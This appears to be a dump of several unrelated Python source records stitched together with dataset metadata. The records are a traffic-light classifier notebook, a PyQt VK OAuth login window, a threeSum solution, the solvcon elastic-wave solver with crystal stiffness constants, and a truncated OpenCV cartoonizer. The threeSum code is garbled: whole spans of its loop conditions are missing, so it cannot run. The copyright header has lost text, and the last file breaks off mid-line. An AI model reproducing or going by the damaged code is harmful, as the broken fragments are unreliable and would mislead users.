from the classifier\n predicted_label = estimate_label(im)\n assert(len(predicted_label) == 3), \"The predicted_label is not the expected length (3).\"\n\n # Compare true and predicted labels \n if(predicted_label != true_label): \n # If these labels are not equal, the image has been misclassified\n misclassified_images_labels.append((im, predicted_label, true_label))\n \n # Return the list of misclassified [image, predicted_label, true_label] values\n return misclassified_images_labels\n\n# Find all misclassified images in a given test set\nMISCLASSIFIED = get_misclassified_images(STANDARDIZED_TEST_LIST)\n\n# Accuracy calculations\ntotal = len(STANDARDIZED_TEST_LIST)\nnum_correct = total - len(MISCLASSIFIED)\naccuracy = num_correct/total\n\n# Print Result of Accuracy and Misclassified Images\nprint('Accuracy of Trafic Light Classifier = {:.2f}%'.format(accuracy*100) + ' (' + str(accuracy) + ')')\nprint(\"Number of misclassified images = \" + str(len(MISCLASSIFIED)) +' out of '+ str(total) + ' images')\n\n\n# ---\n# \n# ### Visualize the misclassified images\n# \n# Visualize some of the images you classified wrong (in the `MISCLASSIFIED` list) and note any qualities that make them difficult to classify. This will help you identify any weaknesses in your classification algorithm.\n\n# In[366]:\n\n\n\"\"\"Visualize the Misclassified Images.\nDisplay an image in the `MISCLASSIFIED` list.\nPrint out its predicted label - to see what-\nthe image *was* incorrectly classified as.\n\"\"\" \nprint('-------------------')\nprint('-- MISCLASSIFIED -- ')\n\n# Init Variables\nimages_missclassified = []\nimg_count = 0\n\n# Check each image in misclassified list\nfor image in MISCLASSIFIED:\n # Counting image\n img_count += 1\n print('-------------------')\n \n # Check the features\n images_missclassified = image[0]\n masked_image = extract_features(image[0])\n print('Image :', img_count)\n print('Mode :', mode_value(masked_image))\n print('Median :', median_value(masked_image))\n print('Predict :', image[1])\n print('Actual :', image[2])\n \n # Plot the missclassified images\n f, (fg1, fg2) = plt.subplots(1, 2, figsize=(5,3))\n fg1.set_title('Standard ' + str(img_count))\n fg1.imshow(images_missclassified)\n fg2.set_title('Masked ' + str(img_count))\n fg2.imshow(masked_image)\nprint('-------------------')\n\n\n# ---\n# \n# ## (Question 2): After visualizing these misclassifications, what weaknesses do you think your classification algorithm has? Please note at least two.\n\n# **Answer:** \n# 1. Masking using HSV value cannot cover all of variation color. Especially 'abnormal' ones. \n# 2. 'abnormal' means, color supposedly 'red' is not 'red', color 'yellow' is not 'yellow', and color 'green' is not 'green'.\n# 3. In this case, all image that cannot identify, have almost white/gray color.\n# 4. We must using machine learning for more accurate result.\n\n# ## Test if you classify any red lights as green\n# \n# **To pass this project, you must not classify any red lights as green!** Classifying red lights as green would cause a car to drive through a red traffic light, so this red-as-green error is very dangerous in the real world. \n# \n# The code below lets you test to see if you've misclassified any red lights as green in the test set. **This test assumes that `MISCLASSIFIED` is a list of tuples with the order: [misclassified_image, predicted_label, true_label].**\n# \n# Note: this is not an all encompassing test, but its a good indicator that, if you pass, you are on the right track! This iterates through your list of misclassified examples and checks to see if any red traffic lights have been mistakenly labelled [0, 1, 0] (green).\n\n# In[367]:\n\n\n\"\"\"Testing Red as Green Light.\nTest if missclassified any red lights as green.\nClassifying red lights as green would cause a car to-\ndrive through a red traffic light, so this red-as-green-\nerror is very dangerous in the real world.\n\"\"\" \n# Importing the tests\nimport test_functions\ntests = test_functions.Tests()\n\n# Checking red as green\nif(len(MISCLASSIFIED) > 0):\n # Test code for one_hot_encode function\n tests.test_red_as_green(MISCLASSIFIED)\nelse:\n print(\"MISCLASSIFIED may not have been populated with images.\")\n\n\n# # 5. Improve your algorithm!\n# \n# **Submit your project after you have completed all implementations, answered all questions, AND when you've met the two criteria:**\n# 1. Greater than 90% accuracy classification\n# 2. No red lights classified as green\n# \n# If you did not meet these requirements (which is common on the first attempt!), revisit your algorithm and tweak it to improve light recognition -- this could mean changing the brightness feature, performing some background subtraction, or adding another feature!\n# \n# ---\n\n# ### Going Further (Optional Challenges)\n# \n# If you found this challenge easy, I suggest you go above and beyond! Here are a couple **optional** (meaning you do not need to implement these to submit and pass the project) suggestions:\n# * (Optional) Aim for >95% classification accuracy.\n# * (Optional) Some lights are in the shape of arrows; further classify the lights as round or arrow-shaped.\n# * (Optional) Add another feature and aim for as close to 100% accuracy as you can get!\n","sub_path":"Intro to Self-Driving Cars/P5 - Traffic Light/Traffic_Light_Classifier.py","file_name":"Traffic_Light_Classifier.py","file_ext":"py","file_size_in_byte":31987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650622579","text":"import re\nimport sys\nfrom PyQt4 import QtWebKit, QtCore, QtGui\n\n\nclass MainWindow(QtWebKit.QWebView):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.oauthurl = \"https://oauth.vk.com/authorize?client_id=4923952&\" \\\n \"scope=messages,groups,friends,status&\" \\\n \"redirect_uri=https://oauth.vk.com/blank.html&\" \\\n \"display=page&\" \\\n \"v=5.33&\" \\\n \"response_type=token\"\n self.load(QtCore.QUrl(self.oauthurl))\n\n\n def closeEvent(self, QCloseEvent):\n token = re.findall('access_token=(.+)&e', self.url().toString())\n\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n mw = MainWindow()\n mw.show()\n app.exec_()","sub_path":"apicon/mod_vk.py","file_name":"mod_vk.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114310799","text":"# Given an array nums of n integers, are there elements a, b, c in nums \n# such that a + b + c = 0? Find all unique triplets in the array which gives \n# the sum of zero.\n\n# Note:\n\n# The solution set must not contain duplicate triplets.\n\n# Example:\n\n# Given array nums = [-1, 0, 1, 2, -1, -4],\n\n# A solution set is:\n# [\n# [-1, 0, 1],\n# [-1, -1, 2]\n# ]\n\n\n\ndef threeSum(nums):\n\n nums.sort()\n result = []\n\n for i in range(len(nums)-2):\n if i >0 and nums[i] == nums[i-1]:\n continue\n \n left=i+1\n right=len(nums)-1\n \n while left 0:\n right=right-1\n else:\n result.append([nums[i],nums[left],nums[right]])\n while left.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n\n\"\"\"\nAnisotropic velocity-stress equations solver using the linear CESE method.\n\"\"\"\n\nfrom solvcon.gendata import TypeNameRegistry\nfrom solvcon.anchor import Anchor\nfrom solvcon.hook import BlockHook\nfrom solvcon.kerpak.cese import CeseBC\nfrom solvcon.kerpak.lincese import (LinceseSolver, LinceseCase,\n PlaneWaveSolution)\n\n###############################################################################\n# Solver.\n###############################################################################\n\nclass ElaslinSolver(LinceseSolver):\n \"\"\"\n Basic elastic solver.\n\n @ivar mtrldict: map from names to material objects.\n @itype mtrldict: dict\n @ivar mtrllist: list of all material objects.\n @itype mtrllist: list\n \"\"\"\n from solvcon.dependency import getcdll\n __clib_elaslin = {\n 2: getcdll('elaslin2d', raise_on_fail=False),\n 3: getcdll('elaslin3d', raise_on_fail=False),\n }\n del getcdll\n @property\n def _clib_elaslin(self):\n return self.__clib_elaslin[self.ndim]\n @property\n def _gdlen_(self):\n return 9 * 9 * self.ndim\n def __init__(self, *args, **kw):\n super(ElaslinSolver, self).__init__(*args, **kw)\n self.mtrldict = kw.pop('mtrldict', {})\n self.mtrllist = None\n def make_grpda(self):\n self.mtrllist = self._build_mtrllist(self.grpnames, self.mtrldict)\n for igrp in range(len(self.grpnames)):\n mtrl = self.mtrllist[igrp]\n jaco = self.grpda[igrp].reshape(self.neq, self.neq, self.ndim)\n mjacos = mtrl.get_jacos()\n for idm in range(self.ndim):\n jaco[:,:,idm] = mjacos[idm,:,:]\n @staticmethod\n def _build_mtrllist(grpnames, mtrldict):\n \"\"\"\n Build the material list out of the mapping dict.\n\n @type grpnames: list\n @param mtrldict: the map from names to material objects.\n @type mtrldict: dict\n @return: the list of material object.\n @rtype: Material\n \"\"\"\n mtrllist = list()\n default_mtuple = mtrldict.get(None, None)\n for grpname in grpnames:\n try:\n mtrl = mtrldict.get(grpname, default_mtuple)\n except KeyError as e:\n args = e.args[:]\n args.append('no material named %s in mtrldict'%grpname)\n e.args = args\n raise\n mtrllist.append(mtrl)\n return mtrllist\n\n###############################################################################\n# Case.\n###############################################################################\n\nclass ElaslinCase(LinceseCase):\n \"\"\"\n Case for anisotropic elastic solids.\n \"\"\"\n defdict = {\n 'execution.neq': 9,\n 'solver.solvertype': ElaslinSolver,\n 'solver.mtrldict': dict,\n }\n def make_solver_keywords(self):\n kw = super(ElaslinCase, self).make_solver_keywords()\n # setup material mapper.\n kw['mtrldict'] = self.solver.mtrldict\n return kw\n\n###############################################################################\n# Boundary conditions.\n###############################################################################\n\nclass ElaslinBC(CeseBC):\n \"\"\"\n Basic BC class for elastic problems.\n \"\"\"\n from solvcon.dependency import getcdll\n __clib_elaslinb = {\n 2: getcdll('elaslinb2d', raise_on_fail=False),\n 3: getcdll('elaslinb3d', raise_on_fail=False),\n }\n del getcdll\n @property\n def _clib_elaslinb(self):\n return self.__clib_elaslinb[self.svr.ndim]\n\nclass ElaslinTraction(ElaslinBC):\n vnames = [\n 'bfcsys', 'tau1', 'tau2', 'tau3', 'freq', 'phase',\n ]\n vdefaults = {\n 'bfcsys': 0.0,\n 'tau1': 0.0, 'tau2': 0.0, 'tau3': 0.0, 'freq': 0.0, 'phase': 0.0,\n }\n _ghostgeom_ = 'compress'\n def soln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_soln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n c_int(self.value.shape[1]),\n self.value.ctypes._as_parameter_,\n )\n def dsoln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_dsoln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n\nclass ElaslinTractionFree(ElaslinBC):\n _ghostgeom_ = 'mirror'\n def soln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_free_soln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n def dsoln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_free_dsoln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n\nclass ElaslinTractionFree2(ElaslinBC):\n _ghostgeom_ = 'mirror'\n def soln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_free2_soln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n def dsoln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_free2_dsoln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n\n################################################################################\n# Plane wave solution.\n################################################################################\n\nclass ElaslinPWSolution(PlaneWaveSolution):\n def _calc_eigen(self, **kw):\n from numpy import sqrt\n from numpy.linalg import eig\n wvec = kw['wvec']\n mtrl = kw['mtrl']\n idx = kw['idx']\n nml = wvec/sqrt((wvec**2).sum())\n jacos = mtrl.get_jacos()\n jaco = jacos[0] * nml[0]\n for idm in range(1, len(nml)):\n jaco += jacos[idm] * nml[idm]\n evl, evc = eig(jaco)\n srt = evl.argsort()\n evl = evl[srt[idx]].real\n evc = evc[:,srt[idx]].real\n evc *= evc[0]/abs(evc[0]+1.e-200)\n return evl, evc\n\n################################################################################\n# Anchor.\n################################################################################\n\nclass ElaslinOAnchor(Anchor):\n \"\"\"\n Calculate total energy, i.e., the summation of kinetic energy and strain\n energy.\n \"\"\"\n def _calculate_physics(self):\n from ctypes import byref\n from numpy import empty\n from numpy.linalg import inv\n svr = self.svr\n # input arrays.\n rhos = empty(svr.ngroup, dtype=svr.fpdtype)\n comps = empty((svr.ngroup, 6, 6), dtype=svr.fpdtype)\n for igp in range(svr.ngroup):\n mtrl = svr.mtrllist[igp]\n rhos[igp] = mtrl.rho\n comps[igp,:,:] = inv(mtrl.stiff).T\n # output arrays.\n svr._clib_elaslin.calc_energy(\n byref(svr.exd),\n rhos.ctypes._as_parameter_,\n comps.ctypes._as_parameter_,\n svr.der['energy'].ctypes._as_parameter_,\n )\n def provide(self):\n from numpy import empty\n svr = self.svr\n svr.der['energy'] = empty(svr.ngstcell+svr.ncell, dtype=svr.fpdtype)\n self._calculate_physics()\n def postfull(self):\n self._calculate_physics()\n\n################################################################################\n# Material definition.\n################################################################################\n\nmltregy = TypeNameRegistry() # registry singleton.\nclass MaterialMeta(type):\n \"\"\"\n Meta class for material class.\n \"\"\"\n def __new__(cls, name, bases, namespace):\n newcls = super(MaterialMeta, cls).__new__(cls, name, bases, namespace)\n # register.\n mltregy.register(newcls)\n return newcls\n\nclass Material(object):\n \"\"\"\n Material properties. The constitutive relation needs not be symmetric.\n \n @cvar _zeropoints_: list of tuples for indices where the content should be\n zero.\n @ctype _zeropoints_: list\n @ivar rho: density\n @ivar al: alpha angle.\n @ivar be: beta angle.\n @ivar ga: gamma angle.\n @ivar origstiff: stiffness matrix in the crystal coordinate.\n @ivar stiff: stiffness matrix in the transformed global coordinate.\n \"\"\"\n\n __metaclass__ = MaterialMeta\n\n _zeropoints_ = []\n\n from numpy import array\n K = array([ [\n [1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 1, 0],\n ], [\n [0, 0, 0, 0, 0, 1],\n [0, 1, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0],\n ], [\n [0, 0, 0, 0, 1, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0, 0],\n ], ], dtype='float64')\n del array\n\n def __init__(self, *args, **kw):\n from numpy import empty, dot\n self.rho = kw.pop('rho')\n self.al = kw.pop('al')\n self.be = kw.pop('be')\n self.ga = kw.pop('ga')\n # set stiffness matrix.\n origstiff = empty((6,6), dtype='float64')\n origstiff.fill(0.0)\n for key in kw.keys(): # becaues I pop out the key.\n if len(key) == 4 and key[:2] == 'co':\n try:\n i = int(key[2])-1\n j = int(key[3])-1\n except:\n continue\n assert i < origstiff.shape[0]\n assert j < origstiff.shape[1]\n val = kw.pop(key)\n origstiff[i,j] = val\n self.origstiff = origstiff\n # check for zeros.\n self._check_origstiffzero(self.origstiff)\n # compute the stiffness matrix in the transformed global coordinate\n # system.\n bondmat = self.get_bondmat()\n self.stiff = dot(bondmat, dot(self.origstiff, bondmat.T))\n super(Material, self).__init__(*args, **kw)\n\n def __getattr__(self, key):\n if len(key) == 4 and key[:2] == 'co':\n i = int(key[2])\n j = int(key[3])\n if 1 <= i <= 6 and 1 <= j <= 6:\n return self.origstiff[i-1,j-1]\n elif len(key) == 3 and key[0] == 'c':\n i = int(key[1])\n j = int(key[2])\n if 1 <= i <= 6 and 1 <= j <= 6:\n return self.stiff[i-1,j-1]\n else:\n raise AttributeError\n\n def __str__(self):\n from math import pi\n return '[%s: al=%.2f be=%.2f ga=%.2f (deg)]' % (self.__class__.__name__,\n self.al/(pi/180), self.be/(pi/180), self.ga/(pi/180))\n\n @classmethod\n def _check_origstiffzero(cls, origstiff):\n \"\"\"\n Check for zero in original stiffness matrix.\n\n @note: no assumed symmetry.\n \"\"\"\n for i, j in cls._zeropoints_:\n assert origstiff[i,j] == 0.0\n\n def get_rotmat(self):\n \"\"\"\n Coordinate transformation matrix for three successive rotations through\n the Euler angles.\n\n @return: the transformation matrix.\n @rtype: numpy.ndarray\n \"\"\"\n from numpy import array, cos, sin, dot\n al = self.al; be = self.be; ga = self.ga\n almat = array([\n [cos(al), sin(al), 0],\n [-sin(al), cos(al), 0],\n [0, 0, 1],\n ], dtype='float64')\n bemat = array([\n [1, 0, 0],\n [0, cos(be), sin(be)],\n [0, -sin(be), cos(be)],\n ], dtype='float64')\n gamat = array([\n [cos(ga), sin(ga), 0],\n [-sin(ga), cos(ga), 0],\n [0, 0, 1],\n ], dtype='float64')\n return dot(gamat, dot(bemat, almat))\n\n def get_bondmat(self):\n \"\"\"\n The Bond's matrix M as a shorthand of coordinate transformation for the \n 6-component stress vector.\n\n @return: the Bond's matrix.\n @rtype: numpy.ndarray\n \"\"\"\n from numpy import empty\n rotmat = self.get_rotmat()\n bond = empty((6,6), dtype='float64')\n # upper left.\n bond[:3,:3] = rotmat[:,:]**2\n # upper right.\n bond[0,3] = 2*rotmat[0,1]*rotmat[0,2]\n bond[0,4] = 2*rotmat[0,2]*rotmat[0,0]\n bond[0,5] = 2*rotmat[0,0]*rotmat[0,1]\n bond[1,3] = 2*rotmat[1,1]*rotmat[1,2]\n bond[1,4] = 2*rotmat[1,2]*rotmat[1,0]\n bond[1,5] = 2*rotmat[1,0]*rotmat[1,1]\n bond[2,3] = 2*rotmat[2,1]*rotmat[2,2]\n bond[2,4] = 2*rotmat[2,2]*rotmat[2,0]\n bond[2,5] = 2*rotmat[2,0]*rotmat[2,1]\n # lower left.\n bond[3,0] = rotmat[1,0]*rotmat[2,0]\n bond[3,1] = rotmat[1,1]*rotmat[2,1]\n bond[3,2] = rotmat[1,2]*rotmat[2,2]\n bond[4,0] = rotmat[2,0]*rotmat[0,0]\n bond[4,1] = rotmat[2,1]*rotmat[0,1]\n bond[4,2] = rotmat[2,2]*rotmat[0,2]\n bond[5,0] = rotmat[0,0]*rotmat[1,0]\n bond[5,1] = rotmat[0,1]*rotmat[1,1]\n bond[5,2] = rotmat[0,2]*rotmat[1,2]\n # lower right.\n bond[3,3] = rotmat[1,1]*rotmat[2,2] + rotmat[1,2]*rotmat[2,1]\n bond[3,4] = rotmat[1,0]*rotmat[2,2] + rotmat[1,2]*rotmat[2,0]\n bond[3,5] = rotmat[1,1]*rotmat[2,0] + rotmat[1,0]*rotmat[2,1]\n bond[4,3] = rotmat[0,1]*rotmat[2,2] + rotmat[0,2]*rotmat[2,1]\n bond[4,4] = rotmat[0,0]*rotmat[2,2] + rotmat[0,2]*rotmat[2,0]\n bond[4,5] = rotmat[0,1]*rotmat[2,0] + rotmat[0,0]*rotmat[2,1]\n bond[5,3] = rotmat[0,1]*rotmat[1,2] + rotmat[0,2]*rotmat[1,1]\n bond[5,4] = rotmat[0,0]*rotmat[1,2] + rotmat[0,2]*rotmat[1,0]\n bond[5,5] = rotmat[0,1]*rotmat[1,0] + rotmat[0,0]*rotmat[1,1]\n return bond\n\n def get_jacos(self):\n \"\"\"\n Obtain the Jacobian matrices for the solid.\n\n @param K: the K matrix.\n @type K: numpy.ndarray\n @return: the Jacobian matrices\n @rtype: numpy.ndarray\n \"\"\"\n from numpy import zeros, dot\n rho = self.rho\n sf = self.stiff\n jacos = zeros((3,9,9), dtype='float64')\n for idm in range(3):\n K = self.K[idm]\n jaco = jacos[idm]\n jaco[:3,3:] = K/(-rho) # the upper right submatrix.\n jaco[3:,:3] = -dot(sf, K.T) # the lower left submatrix.\n return jacos\n\n################################################################################\n# Symmetry.\n################################################################################\n\nclass Triclinic(Material):\n \"\"\"\n The stiffness matrix has to be symmetric.\n \"\"\"\n _zeropoints_ = []\n def __init__(self, *args, **kw):\n for key in kw.keys(): # becaues I modify the key.\n if len(key) == 4 and key[:2] == 'co':\n try:\n i = int(key[2])\n j = int(key[3])\n except:\n continue\n symkey = 'co%d%d' % (j, i)\n if i != j:\n assert symkey not in kw\n kw[symkey] = kw[key]\n super(Triclinic, self).__init__(*args, **kw)\n @classmethod\n def _check_origstiffzero(cls, origstiff):\n for i, j in cls._zeropoints_:\n assert origstiff[i,j] == origstiff[j,i] == 0.0\n\nclass Monoclinic(Triclinic):\n _zeropoints_ = [\n (0,3), (0,5),\n (1,3), (1,5),\n (2,3), (2,5),\n (3,4), (4,5),\n ]\n\nclass Orthorhombic(Triclinic):\n _zeropoints_ = [\n (0,3), (0,4), (0,5),\n (1,3), (1,4), (1,5),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n\nclass Tetragonal(Triclinic):\n _zeropoints_ = [\n (0,3), (0,4),\n (1,3), (1,4),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n def __init__(self, *args, **kw):\n kw['co22'] = kw['co11']\n kw['co23'] = kw['co13']\n kw['co26'] = -kw.get('co16', 0.0)\n kw['co55'] = kw['co44']\n super(Tetragonal, self).__init__(*args, **kw)\n\nclass Trigonal(Triclinic):\n _zeropoints_ = [\n (0,5), (1,5),\n (2,3), (2,4), (2,5),\n (3,4),\n ]\n def __init__(self, *args, **kw):\n kw['co15'] = -kw.get('co25', 0.0)\n kw['co22'] = kw['co11']\n kw['co23'] = kw['co13']\n kw['co24'] = -kw.get('co14', 0.0)\n kw['co46'] = kw.get('co25', 0.0)\n kw['co55'] = kw['co44']\n kw['co56'] = kw.get('co14', 0.0)\n kw['co66'] = (kw['co11'] - kw['co12'])/2\n super(Trigonal, self).__init__(*args, **kw)\n\nclass Hexagonal(Trigonal):\n _zeropoints_ = [\n (0,3), (0,4), (0,5),\n (1,3), (1,4), (1,5),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n\nclass Cubic(Triclinic):\n _zeropoints_ = [\n (0,3), (0,4), (0,5),\n (1,3), (1,4), (1,5),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n def __init__(self, *args, **kw):\n kw['co13'] = kw['co12']\n kw['co22'] = kw['co11']\n kw['co23'] = kw['co12']\n kw['co33'] = kw['co11']\n kw['co55'] = kw['co44']\n kw['co66'] = kw['co44']\n super(Cubic, self).__init__(*args, **kw)\n\nclass Isotropic(Triclinic):\n _zeropoints_ = [\n (0,3), (0,4), (0,5),\n (1,3), (1,4), (1,5),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n def __init__(self, *args, **kw):\n kw['co12'] = kw['co11']-2*kw['co44']\n kw['co13'] = kw['co11']-2*kw['co44']\n kw['co22'] = kw['co11']\n kw['co23'] = kw['co11']-2*kw['co44']\n kw['co33'] = kw['co11']\n kw['co55'] = kw['co44']\n kw['co66'] = kw['co44']\n super(Isotropic, self).__init__(*args, **kw)\n\n################################################################################\n# Material properties.\n################################################################################\n\nclass GaAs(Cubic):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 5307.0)\n kw.setdefault('co11', 11.88e10)\n kw.setdefault('co12', 5.38e10)\n kw.setdefault('co44', 5.94e10)\n super(GaAs, self).__init__(*args, **kw)\n\nclass ZnO(Hexagonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 5680.0)\n kw.setdefault('co11', 20.97e10)\n kw.setdefault('co12', 12.11e10)\n kw.setdefault('co13', 10.51e10)\n kw.setdefault('co33', 21.09e10)\n kw.setdefault('co44', 4.247e10)\n super(ZnO, self).__init__(*args, **kw)\n\nclass CdS(Hexagonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 4820.0)\n kw.setdefault('co11', 9.07e10)\n kw.setdefault('co12', 5.81e10)\n kw.setdefault('co13', 5.1e10)\n kw.setdefault('co33', 9.38e10)\n kw.setdefault('co44', 1.504e10)\n super(CdS, self).__init__(*args, **kw)\n\nclass Zinc(Hexagonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 7.1*1.e-3/(1.e-2**3))\n kw.setdefault('co11', 14.3e11*1.e-5/(1.e-2**2))\n kw.setdefault('co12', 1.7e11*1.e-5/(1.e-2**2))\n kw.setdefault('co13', 3.3e11*1.e-5/(1.e-2**2))\n kw.setdefault('co33', 5.0e11*1.e-5/(1.e-2**2))\n kw.setdefault('co44', 4.0e11*1.e-5/(1.e-2**2))\n super(Zinc, self).__init__(*args, **kw)\n\nclass Beryl(Hexagonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 2.7*1.e-3/(1.e-2**3))\n kw.setdefault('co11', 26.94e11*1.e-5/(1.e-2**2))\n kw.setdefault('co12', 9.61e11*1.e-5/(1.e-2**2))\n kw.setdefault('co13', 6.61e11*1.e-5/(1.e-2**2))\n kw.setdefault('co33', 23.63e11*1.e-5/(1.e-2**2))\n kw.setdefault('co44', 6.53e11*1.e-5/(1.e-2**2))\n super(Beryl, self).__init__(*args, **kw)\n\nclass Albite(Triclinic):\n def __init__(self, *args, **kw):\n #kw.setdefault('rho', )\n kw.setdefault('co11', 69.9e9)\n kw.setdefault('co22', 183.5e9)\n kw.setdefault('co33', 179.5e9)\n kw.setdefault('co44', 24.9e9)\n kw.setdefault('co55', 26.8e9)\n kw.setdefault('co66', 33.5e9)\n kw.setdefault('co12', 34.0e9)\n kw.setdefault('co13', 30.8e9)\n kw.setdefault('co14', 5.1e9)\n kw.setdefault('co15', -2.4e9)\n kw.setdefault('co16', -0.9e9)\n kw.setdefault('co23', 5.5e9)\n kw.setdefault('co24', -3.9e9)\n kw.setdefault('co25', -7.7e9)\n kw.setdefault('co26', -5.8e9)\n kw.setdefault('co34', -8.7e9)\n kw.setdefault('co35', 7.1e9)\n kw.setdefault('co36', -9.8e9)\n kw.setdefault('co45', -2.4e9)\n kw.setdefault('co46', -7.2e9)\n kw.setdefault('co56', 0.5e9)\n super(Albite, self).__init__(*args, **kw)\n\nclass Acmite(Monoclinic):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 3.5e3)\n kw.setdefault('co11', 185.8e9)\n kw.setdefault('co22', 181.3e9)\n kw.setdefault('co33', 234.4e9)\n kw.setdefault('co44', 62.9e9)\n kw.setdefault('co55', 51.0e9)\n kw.setdefault('co66', 47.4e9)\n kw.setdefault('co12', 68.5e9)\n kw.setdefault('co13', 70.7e9)\n kw.setdefault('co15', 9.8e9)\n kw.setdefault('co23', 62.9e9)\n kw.setdefault('co25', 9.4e9)\n kw.setdefault('co35', 21.4e9)\n kw.setdefault('co46', 7.7e9)\n super(Acmite, self).__init__(*args, **kw)\n\nclass AlphaUranium(Orthorhombic):\n def __init__(self, *args, **kw):\n #kw.setdefault('rho', )\n kw.setdefault('rho', 8.2e3) # a false value.\n kw.setdefault('co11', 215.e9)\n kw.setdefault('co22', 199.e9)\n kw.setdefault('co33', 267.e9)\n kw.setdefault('co44', 124.e9)\n kw.setdefault('co55', 73.e9)\n kw.setdefault('co66', 74.e9)\n kw.setdefault('co12', 46.e9)\n kw.setdefault('co13', 22.e9)\n kw.setdefault('co23', 107.e9)\n super(AlphaUranium, self).__init__(*args, **kw)\n\nclass BariumTitanate(Tetragonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 6.2e3)\n kw.setdefault('co11', 275.0e9)\n kw.setdefault('co33', 165.0e9)\n kw.setdefault('co44', 54.3e9)\n kw.setdefault('co66', 113.0e9)\n kw.setdefault('co12', 179.0e9)\n kw.setdefault('co13', 151.0e9)\n super(BariumTitanate, self).__init__(*args, **kw)\n\nclass AlphaQuartz(Trigonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 2.651e3)\n kw.setdefault('co11', 87.6e9)\n kw.setdefault('co33', 106.8e9)\n kw.setdefault('co44', 57.2e9)\n kw.setdefault('co12', 6.1e9)\n kw.setdefault('co13', 13.3e9)\n kw.setdefault('co14', 17.3e9)\n super(AlphaQuartz, self).__init__(*args, **kw)\n\nclass RickerSample(Isotropic):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 2200.e0)\n kw.setdefault('co11', 3200.e0**2*2200.e0)\n kw.setdefault('co44', 1847.5e0**2*2200.e0)\n super(RickerSample, self).__init__(*args, **kw)\nclass RickerSampleLight(Isotropic):\n def __init__(self, *args, **kw):\n scale = 1.e-3\n kw.setdefault('rho', 2200.e0*scale)\n kw.setdefault('co11', 3200.e0**2*2200.e0*scale)\n kw.setdefault('co44', 1847.5e0**2*2200.e0*scale)\n super(RickerSampleLight, self).__init__(*args, **kw)\n","sub_path":"solvcon/kerpak/elaslin.py","file_name":"elaslin.py","file_ext":"py","file_size_in_byte":23973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407421956","text":"from tkinter import *\r\nfrom PIL import ImageTk, Image\r\nfrom tkinter import filedialog\r\nfrom tkinter.ttk import *\r\nimport cv2\r\nfrom time import strftime\r\nimport tkinter.font\r\n\r\n\r\ndef open_imgC():\r\n \r\n x = openfilename()\r\n img = cv2.imread(x);\r\n img=cv2.resize(img,(500,500))\r\n numDownsamples=2\r\n numBilateralFilter=50\r\n img_color=img\r\n for i in range(numDownsamples):\r\n img_color=cv2.pyrDown(img_color)\r\n for i in range(numBilateralFilter):\r\n img_color = cv2.bilateralFilter(img_color, 9, 9, 7)\r\n for i in range(numDownsamples):\r\n img_color = cv2.pyrUp(img_color)\r\n\r\n\r\n\t\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\r\n img_blur = cv2.medianBlur(img_gray, 3)\t\r\n img_edge = cv2.adaptiveThreshold(img_blur, 255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY, 5, 2)\r\n (x,y,z) = img_color.shape\r\n img_edge = cv2.resize(img_edge,(y,x))\r\n img_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)\r\n cv2.imwrite(\"edge.png\",img_edge)\r\n cimage=cv2.bitwise_and(img_color, img_edge)\r\n cimage = cv2.copyMakeBorder(cimage, 10, 10, 10, 10, cv2.BORDER_CONSTANT)\r\n cv2.imshow('Cartonized image',cimage)\r\n cv2.waitKey(0)\r\n\r\n\r\n\r\n \r\ndef Blur_image():\r\n x = 